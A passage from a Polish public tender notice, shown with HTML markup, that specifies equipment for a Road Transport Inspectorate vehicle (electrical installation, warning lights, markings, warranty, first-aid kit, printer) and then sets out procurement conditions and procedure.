testów.49.	Generator prądotwórczy o mocy minimalnej 1,7 kW, zapewniający doładowanie zespołu dwóch dodatkowych akumulatorów oraz użytkowanie zainstalowanych odbiorników prądu (dwa komputery, laserowe urządzenie wielofunkcyjne, wagi przenośne, dymomierz, oświetlenie wewnętrzne i zewnętrzne) zamontowany w części technicznej. Podczas pracy generatora musi istnieć możliwość użytkowania wszystkich wskazanych urządzeń jednocześnie. Silnik benzynowy, czterosuwowy lub diesla. Czas pracy bez tankowania przy pełnym obciążeniu min. 3h. Zabezpieczenie termiczne i przeciążeniowe generatora. Podczas pracy generator powinien zasilać wszystkie gniazda 230V i ładować akumulatory dodatkowe, a po jego wyłączeniu zasilanie 230V powinno odbywać się poprzez użycie ręcznego przełącznika źródła zasilania - z przetwornicy. Agregat ma być wyposażony w licznik motogodzin oraz kabel do ładowania akumulatorów. Musi istnieć możliwość łatwego wyjmowania generatora oraz zasilania instalacji elektrycznej podczas pracy generatora poza przedziałem technicznym (na zewnątrz pojazdu). Zastosowany generator prądotwórczy (agregat) musi spełniać przepisy obowiązujące w Unii Europejskiej dla tego typu urządzeń. Zamawiający wymaga dodatkowego kabla zasilającego do agregatu, który zasili złącze 230V pojazdu o długości 5m.50.	Bezobsługowy, automatyczny układ ładowania (ładowarka min. 50A) dwóch akumulatorów dodatkowych oraz akumulatora rozruchowego przy podłączonym zasilaniu w czasie postoju przy podłączonym zasilaniu 230 V z jednym gniazdem zewnętrznym zamontowanym w bocznej ścianie pojazdu lub tylnym zderzaku. Alternator zamontowany w pojeździe musi zapewniać podczas pracy silnika ładowanie zarówno akumulatora rozruchowego jak i akumulatorów dodatkowych zamontowanych w przedziale biurowym. Przewód do ładowania z zewnętrznego źródła zasilania o długości min. 10 m. Wymagana kontrolka ładowania w/w akumulatorów w kabinie kierowcy po lewej stronie kierownicy.51.	Zabezpieczenie uniemożliwiające rozruch silnika przy podłączonym zasilaniu zewnętrznym 230 V lub uruchomionym agregacie prądotwórczym wraz z zabezpieczeniem przeciwporażeniowym. Zabezpieczenie przed jednoczesnym podłączeniem zasilania zewnętrznego i zasilania z agregatu prądotwórczego. 52.	Centralny wyłącznik źródła zasilania dla przedziału biurowego, zabezpieczony przed przypadkowym użyciem.53.	Minimum osiem gniazd 230 V w przedziale biurowym do zasilania urządzeń biurowych oraz dwa w przedziale magazynowym. Gniazda w przedziale biurowym w miejscu łatwo dostępnym(powyżej poziomu stolików). Gniazda nad biurkiem inspektorów w następującej konfiguracji: zasilanie , zasilanie, RJ-45, zapalniczka. Jedno samochodowe gniazdo 12V (typu ,,zapalniczka") w przedziale magazynowym i co najmniej dwa w przedziale biurowym w tym jedno zasilane poza wyłącznikiem głównym do ładowania latarki na ścianie dzielącej przedział biurowy i magazynowy. Włącznik światła punktowego powinien znajdować się w miejscu uniemożliwiającym jego przypadkowe przyciśnięcie. Gniazda zasilające, gniazdo rj45 oraz włącznik lampki powinny być zamontowane w elektrycznej ramce czterokrotnej.54.	Okablowanie wewnętrznej instalacji transmisji danych zabudowane, umożliwiające jednoczesne podłączenie urządzenia wielofunkcyjnego i dwóch komputerów oraz współpracę komputerów z drukarką (zabudowane przewody UTP- typu skrętka - z końcówkami Rj 45 z miejsca przewidzianego na ruter/modem internetowy (w prawym górnym rogu przy bocznej ściance od strony wewnętrznej przy miejscu na drukarkę) do urządzenia wielofunkcyjnego oraz do biurek inspektorów za pomocą gniazda RJ-45. zapewniające komunikację pomiędzy komputerami i urządzeniem wielofunkcyjnym). Zapewniony dostęp do zamontowanej w pojeździe przetwornicy.55.	Pojazd wyposażony po dwie pary reflektorów zewnętrzne typu LED ze światłem rozproszonym, zamontowane na stałe w górnej tylnej i przedniej części samochodu po jego prawej stronie i lewej stronie. Zasilanie elektryczne z zespołu dwóch akumulatorów dodatkowych. 56.	Belka świetlna z dwoma lampami błyskowymi koloru niebieskiego zamontowana w sposób trwały na dachu centralnie z przodu samochodu z podświetlaną tablicą koloru białego z napisem barwy czarnej ,,INSPEKCJA TRANSPORTU DROGOWEGO" z przodu i z tyłu belki, zgodnie ze wzorem określonym w rozporządzeniu Ministra Transportu , Budownictwa i Gospodarki Morskiej z dnia 10.04.2012r. w sprawie wzoru odznaki identyfikacyjnej inspektorów Inspekcji Transportu Drogowego oraz oznakowania pojazdów służbowych Inspekcji Transportu Drogowego ( Dz.U. z 2012r.,poz.402). Lampy ostrzegawcze oparte o technologię LED. Zasilanie z akumulatora rozruchowego.57.	Dwa dodatkowe światła w przedniej atrapie silnika wysyłające sygnał świetlny barwy niebieskiej działające wspólnie z belkami świetlnymi w technologii LED. Zasilanie z akumulatora rozruchowego. Światła zamontowane prostopadle do jezdni.58.	Urządzenie wysyłające sygnały dźwiękowe o zmiennym tonie. Belka może być zintegrowana z urządzeniem wysyłającym sygnały dźwiękowe o zmiennym tonie, stanowiącym obowiązkowe wyposażenie dla samochodu uprzywilejowanego. W razie oddzielnego montażu urządzenia wysyłającego zmienny sygnał dźwiękowy sterowanie sygnałami świetlnymi oraz włączanie sygnału dźwiękowego odbywać się musi z jednego panelu łatwo dostępnego dla kierowcy pojazdu. Zamontowane sygnały ostrzegawcze muszą spełniać warunki, o których mowa w § 25 i 26 rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (t.j. Dz.U. z 2015r., poz.305). Zasilanie z akumulatora rozruchowego.59.	Belka świetlna z dwoma lampami błyskowymi koloru niebieskiego zamontowana w sposób trwały na dachu centralnie z tyłu samochodu z tablicą tekstową LED do wyświetlania komunikatów słownych o zmiennej treści (możliwość zaprogramowania minimum 50 komunikatów w różnych językach np. niemiecki, angielski, rosyjski itp. - dostępne znaki do zaprogramowania - polskie, cyrylica itp.), np. ZJEDŹ NA PARKING, STOP, KONTROLA, tablica winna również umożliwiać wyświetlanie komunikatu w formie szyldu podświetlanego ,,INSPEKCJA TRANSPORTU DROGOWEGO" w trybie standardowym. Tryb wyświetlania komunikatu na tablicy winien być widoczny na panelu sterownia tablicą. Sterownik do tablic tekstowych winien umożliwiać podgląd w czasie rzeczywistym treści oraz trybu wyświetlania komunikatu. Lampy ostrzegawcze oparte o technologię LED. Lampy wyposażone dodatkowo w lampy typu LED - pomarańczowe oraz białe ( oświetlenie tylnego przedpola) podłączone do instalacji pojazdu bazowego - lampy żółte połączone z kierunkowskazami pojazdu, lampy czerwone z lampami STOP. Zasilanie z akumulatora rozruchowego.60.	Całkowita wysokość wyżej opisanej belki świetlnej nie powinna przekraczać 130mm.61.	Pas odblaskowy barwy białej opasający pojazd, o szerokości od 80 do 120 mm, znajdujący się w połowie wysokości pomiędzy dolną krawędzią okien a progiem pojazdu. 62.	Napis ,,INSPEKCJA TRANSPORTU DROGOWEGO" barwy białej, umieszczony po obu stronach samochodu nad pasem odblaskowym barwy białej. Logo Inspekcji Transportu Drogowego na bocznych drzwiach kierowcy i pasażera z folii samoprzylepnej.63.	Napis ,,INSPEKCJA TRANSPORTU DROGOWEGO" koloru czarnego z przodu samochodu oraz na tylnych drzwiach. Na poszyciu pojazdu mają zostać umieszczone 3 (trzy) numery taktyczne floty. Dwa białe umieszczone po lewej i prawej stronie pojazdu nad pasem odblaskowym w tylnej części pojazdu. Trzeci czarny numer umieszczony na tylnych drzwiach pojazdu z prawej strony.64.	Okres gwarancji na samochód - co najmniej 24 miesiące bez limitu km. Oferowany okres gwarancji nie może być uzależniony od wniesienia dodatkowych opłat przez zamawiającego.65.	Okres gwarancji na zabudowę, w tym dodatkową instalację elektryczną - nie mniej niż 24 miesiące. Naprawy gwarancyjne w miejscu użytkowania samochodu. Czas reakcji od czasu zgłoszenia usterki nie dłuższy niż 48 godzin.66.	Gwarancja na nadwozie (części blacharskie i lakiernicze) - co najmniej 3 lat. Oferowany okres gwarancji nie może być uzależniony od wniesienia dodatkowych opłat przez Zamawiającego.67.	Czas reakcji serwisu od czasu zgłoszenia usterki nie dłuższy niż 48 godzin. Oferowany okres gwarancji nie może być uzależniony od wniesienia dodatkowych opłat przez Zamawiającego.68.	Sieć autoryzowanych stacji obsługi (ASO) na terenie całej Polski - co najmniej jedna stacja w każdym województwie lub w innym województwie w odległości nie większej niż 150 km od miasta wojewódzkiego w województwie, w którym nie ma autoryzowanej stacji obsługi.69.	Serwis pojazdu realizowany w najbliższym ASO dla siedziby Zamawiającego: nazwa firmy, adres, telefon, e-mail (podać)70.	Serwis zabudowy realizowany przez: nazwa firmy, adres, telefon, e-mail (podać).71.	Koło zapasowe pełnowymiarowe , podnośnik, klucz do zmiany koła.72.	Centralny zamek sterowany pilotem.73.	Immobiliser.74.	Tempomat.75.	Trójkąt, gaśnica (min. 2kg zamontowana w przedziale kierowcy i gaśnica min. 6 kg zamontowana w przedziale magazynowym -zamontowane w uchwycie fabrycznym, w przypadku braku uchwytu fabrycznego wymagany uchwyt do gaśnicy), lewarek, apteczka, komplet dywaników gumowych, min 2 komplety kluczyków, szczotka ze skrobaczką, kable rozruchowe (o długości minimum 2 x 5 metrów oraz prądzie 1200A) w opakowaniu zbiorczym.76.	Radio z CD wraz z instalacją radiową + głośniki + możliwość uruchomienia radia bez zapłonu samochodu.77.	Apteczka wyposażona w:a)	środki odkażające:- woda utleniona- 1 szt.- spirytus salicylowy 1 szt.b) materiały opatrunkowe:- kompresy jałowe wym. 5x5 cm - 2 op.- kompresy jałowe wym. 9x9 cm - 2 op.- opaska dziana szer. 5 cm - 2 szt.- opaska dziana szer. 12 cm - 2 szt.- gaza jałowa 1mx1m,- zestaw plastrów z opatrunkiem na folii - opaska elastyczna szer. 12 cm - 1 szt.- opaska elastyczna szer. 15 cm - 1 szt.c) Rękawiczki lateksowe : 2 pary.d) Nożyczki : 1 szt.e) Roztwór soli fizjologicznej: - 0,9%NaCl250 ml szt.1.- 0,9%NaCl10 ml szt.5.f) Maseczka jednorazowa do sztucznego oddychania.g) Koc ratunkowy/folia termiczna.h) Szyna Kramera duża-1 szt., mała-1 szt. 78.	Urządzenie do wybijania szyb samochodowych - młotek bezpieczeństwa - 2 sztuki, jedna zamontowana w kabinie kierowcy nad lewymi drzwiami przymocowane na stałe do poszycia wewnętrznego pojazdu , druga w przedziale biurowym.79.	Nóż do ciecia pasów zamontowany w przedziale kierowcy.80.	Dodatkowy komplet opon letnich z felgami stalowymi.81.	Chlapacze przednie i tylne.82.	Antena dookólna w standardzie LTE z wtykiem podwójnym SMA wyprowadzonym w miejscu posadowienia modemu GSM w prawym górnym rogu przy bocznej ściance od strony wewnętrznej przy miejscu na drukarkę.83.	Wykonawca przed wykonaniem zabudowy przedziału biurowego i magazynowego uwzględni wskazania Zamawiającego i uzyska akceptację na:- planowane rozmieszczenie siedzisk oraz mebli, w tym rodzaj użytych materiałów ,- planowaną kolorystykę,- planowaną zabudowę w części magazynowej pojazdu.84.	Dostarczenie wraz z pojazdem świadectwa zgodności dla pojazdu skompletowanego gwarantującej rejestrację pojazdu: jako specjalny.85. Dokumenty do przekazania zamawiającemu:- schematy elektryczne zabudowy,- instrukcje demontażu zabudowy,- faktura,- homologacja na pojazd skompletowany.- wykaz stacji ASO,86.	Autoalarm87.	Pojazd powinien być wyposażony w urządzenie wielofunkcyjne o następujących parametrach:- typ druku: Laserowa, monochromatyczna- metoda drukowania: elektrograficzna drukarka laserowa- pojemność pamięci: min. 60 MB- wyświetlacz LCD: min. przekątna 2,6 cala- prędkość drukowania: min. 28 str./min.- funkcja faksu z automatycznym wysyłaniem dwustronnym: tak- funkcja automatycznego dupleks: dla kopiowania, skanowania i drukowania- procesor: min. 260 MHz- podajnik dokumentów ADF: min. 30 arkuszy- podajnik standardowy: min. 240 arkuszy- interfejs sieciowy: przewodowy i bezprzewodowy (obsługa 802.11b/g/n)- podajnik ręczny na formaty: A6-A4, dopuszczalna gramatura z 65-160 g/m2- waga: max. 12 kg- wymiary urządzenia: maksymalne wymiary szerokość 410 mm x głębokość 400 mm x wysokość 320 mm- czas wykonania pierwszej kopii: mniej niż 10 sekund- czas wykonania pierwszego wydruku: mniej niż 8.5 sekundy- typ skanera: podwójny CIS- rozdzielczość skanera: min 600 x 2,400dpi (z szyby skanera), min 600 x 600dpi (z ADF)Na urządzenie wielofunkcyjne wymagana jest gwarancja producenta.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">34114000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-12-29</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-12-29</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa warunków udziału w postępowaniu. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa warunków udziału w postępowaniu. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie określa warunków udziału w postępowaniu. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Ocena wstępna, której poddawani są wszyscy wykonawcy zostanie dokonana w oparciu o informacje zawarte w oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty (lub przesłanych przez Wykonawców, po otwarciu ofert - oświadczenie dotyczące przynależności do grupy kapitałowej) i stanowić będzie wstępne potwierdzenie że wykonawca nie podlega wykluczeniu. Korzystając z przepisów art. 26 ust. 2 ustawy Pzp Zamawiający przed udzieleniem zamówienia nie wymaga od wykonawcy, którego oferta została najwyżej oceniona złożenia dokumentów potwierdzających brak podstaw do wykluczenia. Dla wykonawcy, którego oferta została najwyżej oceniona wstępna ocena braku podstaw do wykluczenia będzie jednocześnie oceną ostateczną. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">Zgodnie z art. 26 ust. 1 ustawy Pzp Zamawiający przed udzieleniem zamówienia, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń potwierdzających spełnianie przez oferowane dostawy wymagań określonych przez Zamawiającego, o których mowa w niniejszym Rozdziale. Zgodnie z §13 ust. 1 Rozporządzenia Ministra Rozwoju z dnia 27.07.2016 r. w sprawie rodzajów dokumentów jakich może żądać Zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 poz. 1126), od wykonawcy, którego oferta została najwyżej oceniona wymagane jest, w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego w załącznikach numer 1.1, 1.2, do SIWZ, przedstawienie Oświadczenia potwierdzającego spełnianie przez oferowane pojazdy wymagań Zamawiającego opisanych w załącznikach numer 1.1, 1.2, do SIWZ, wykonanego poprzez wypełnienie i podpisanie załączników numer 1.1, 1.2, do SIWZ. Zamawiający wymaga, aby dane wpisane w oświadczenie wykonawcy, które mają odzwierciedlenie w świadectwie zgodności WE (świadectwie homologacji) były z nimi tożsame. Oświadczenia należy przedstawić w formie oryginału (podstawa prawna: §14 ust. 1 Rozporządzenia Ministra Rozwoju z dnia 27.07.2016 r. w sprawie rodzajów dokumentów jakich może żądać Zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 poz. 1126) . </span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykaz oświadczeń i dokumentów, które Wykonawca składa wraz z ofertą. 1) wypełniony formularz ofertowy sporządzony z wykorzystaniem wzoru stanowiącego Załącznik nr 2 do SIWZ, zawierający w szczególności: wskazanie oferowanego przedmiotu zamówienia, całkowitą cenę ofertową brutto oraz dane dotyczące wszystkich parametrów podlegających ocenie; 2) Do oferty wykonawca dołącza aktualne na dzień składania ofert oświadczenie, że nie podlega wykluczeniu (zgodnie z załącznikiem nr 3 do SIWZ). 3) Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom zamieszcza informację o podwykonawcach w załączniku numer 5 do SIWZ. 4) Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 Ustawy Pzp: a) są zobowiązani ustanowić Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy. b) są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt a) specyfikacji. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza. Pełnomocnictwo może być udzielone w szczególności: - łącznie przez wszystkich Wykonawców (jeden dokument), - oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców). Wszelka korespondencja prowadzona będzie z Pełnomocnikiem Konsorcjum jeżeli załączone pełnomocnictwo nie będzie wskazywało inaczej. 4.1 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego składają, każdy z osobna, oświadczenie wymienione w pkt 2. Oświadczenia te powinny brak podstaw wykluczenia każdego z wykonawców. 5) Wyciąg ze świadectwa homologacji typu pojazdu dla pojazdu bazowego, na którym zostaną wykonane prace adaptacyjne w zakresie zabudowy lub świadectwo zgodności WE dla kompletnych pojazdów, potwierdzające parametry pojazdu stanowiące podstawę do obliczenia punktów w kryteriach pozacenowych. W związku z tym, że wskazany dokument stanowi potwierdzenie parametrów oferowanego pojazdu, które stanowią kryteria oceny ofert, dokument ten nie podlega uzupełnieniu. Dokument ten, może zostać przedstawiony w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 6) W przypadku wnoszenia oferty przez wspólników spółki cywilnej należy załączyć dodatkowo gdy oferta nie jest podpisana przez wszystkich wspólników - pełnomocnictwo wspólników do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy podpisane przez wszystkich wspólników lub ich prawnie upoważnionych przedstawicieli. Pełnomocnictwo winno być przedstawione w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez notariusza. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span 